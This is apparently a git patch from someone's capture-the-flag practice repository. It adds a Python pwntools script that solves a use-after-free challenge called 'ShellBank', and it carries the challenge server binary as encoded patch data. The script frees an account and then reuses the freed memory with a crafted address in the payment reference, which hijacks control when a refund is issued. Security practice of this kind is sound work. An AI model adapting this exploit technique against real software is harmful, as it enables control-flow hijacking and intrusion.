From a922995ff3faba3387fc4e952b2248a91eecf278 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Mon, 4 Apr 2022 13:29:45 +0800 Subject: [PATCH] Finished UAF/ShellBank --- UAF/ShellBank/answer.py | 50 ++++++++++++++++++++++++++++++++++++++++ UAF/ShellBank/server | Bin 0 -> 17512 bytes 2 files changed, 50 insertions(+) create mode 100755 UAF/ShellBank/answer.py create mode 100755 UAF/ShellBank/server diff --git a/UAF/ShellBank/answer.py b/UAF/ShellBank/answer.py new file mode 100755 index 0000000..59ea608 --- /dev/null +++ b/UAF/ShellBank/answer.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python2 +# coding = utf-8 + +from pwn import * +from LibcSearcher import * +context(arch = "amd64", os = "linux", log_level = "debug") + +def send_choice(choice): + p.recvuntil('> ') + p.sendline(str(choice)) + +def add_account(name): + send_choice(3) + p.recvuntil('Enter account name: ') + p.sendline(name) + +def record_payment(message, money, receiver, sender): + send_choice(4) + p.recvuntil('Enter reference: ') + p.sendline(message) + p.recvuntil('Enter value: ') + p.sendline(str(money)) + p.recvuntil('Enter id of recipient: ') + p.sendline(str(receiver)) + p.recvuntil('Enter id of sender: ') + p.sendline(str(sender)) + +def refund_payment(transaction_id, account_id): + send_choice(5) + p.recvuntil('Enter transaction id: ') + p.sendline(str(transaction_id)) + p.recvuntil('Enter id of either account: ') + p.sendline(str(account_id)) + +def delete_account(account): + send_choice(6) + p.recvuntil('Enter account id: ') + p.sendline(str(account)) + + +p = process('./server') +elf = ELF('./server') +gdb.attach(p, "") +add_account(b'A') +add_account(b'B') +record_payment(b'Transaction-Normal', 0, 0, 1) +delete_account(1) +record_payment(b'\xc9\x17\x40', 0, 0, 0) +refund_payment(0, 0) +p.interactive() diff --git a/UAF/ShellBank/server b/UAF/ShellBank/server new file mode 100755 index 0000000000000000000000000000000000000000..682959c27b89d4e43494bb245f47673cad393df5 GIT binary patch literal 17512 zcmeHPdvILUc|W_dY+-Ckeh4cz;ETai8{)NOgDs25+?BQFipq}|3rxUVuXeAb#j9Oq z_pXsM7))dc%Odau(mH9As7%_>cF54wp-yIEWSd$;N?SuS)J^H25C>M3AqtP81jF|C zoyXO^Ybi6C&h(GW9?#zIe82B;zVn@PkM8UEfl%9Kzt6{1@w1JLxS?vDL*mHTiYCrV ztbtw1ban;1oXrF>13#Thh>Dt`-F_iZv_k5Yfs)-bQvQrz2S>b41fE4vR7FUX>?VsY ztAd`TfKU`=)q*Fxa;i$6$^I!i_fny!sM2%V(}bL9x~NEcmODjzlDh3Elmm?^64J`X#YYN_$NiAwtp+1_+{8JGQ2RI+S!Jl3)9`qlC1s(37s>08y; zux{15>jUXzU=8p0LNrfv>gKKO?AzP^eoo<`@Xj-DzxCLCFTHik-j3`)P}~#)`6C@F zq_5IX^*Q*FocGJ8v4g&9KVft6qq6df$1d+|4_9w^FQ=xZ5V(#O>hoQ^s*>NS@I}+$ zZPVbPX>c08sr=tM4Zd<3{88WMNrvO{xJ6_r=Q)x0H{$}8cO1jte=^G$8i992bg;eG{zu5jUW&Ztu7!qplpRJsL?sDOB33o|L)lvpZ87O6-lz~zPN*O3+pp=2)3>f|A zD~w$EJF6Kp9vZU!g)>I~ixsCFwZaW=LR46O4#%pcI%>pslYDfffU^8&#M7nY=o!wx zO1z)=A_cI=bt8? zE)7TbfUke2HT%llM)pmk|J?ZYovp(|Y>Cc{;S+<4i44EK2r<{pgv|$4OIsK_)fuQ- zdI;9k9q`9`aRF&G(a~OTj9^N`B`*+A80kEGs?%+tv*TRr{!7M5AmZe)L%zaKp~UA`2EZ}%w~pSQiS$4N1J;JlH|j2PMW zvqmm7V&wE%BO979`VUO7Og(ROY#k&MIlX#A=zL~A>dfq-aIP!;pwGM)oy|WDCi8)9rA+y&_lhx2rJZK(gDVI#P_zh(0bBjkY6X^lv%1 z$sDTsLqnOjg@CJRyrWJxknaQeTzM;6Y5Ejr!M-KO>3M}Q(DW#7+jy7r6Bi1F(Z>+} zaq5HU)(603o+gX|o=OCK+Q|NUJ_}K<=A+N@xFn)T#pt+53&a?Jb2&&MZ9ko4|WVG zsd)gpxzGjU#0Y$0VCbBw`r42)mFh5+vKhqNj)}45Y%X*jsecx8y?@+yXecu;7s>

YwB>a4cFS1|H~0)qF*H9M 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 jH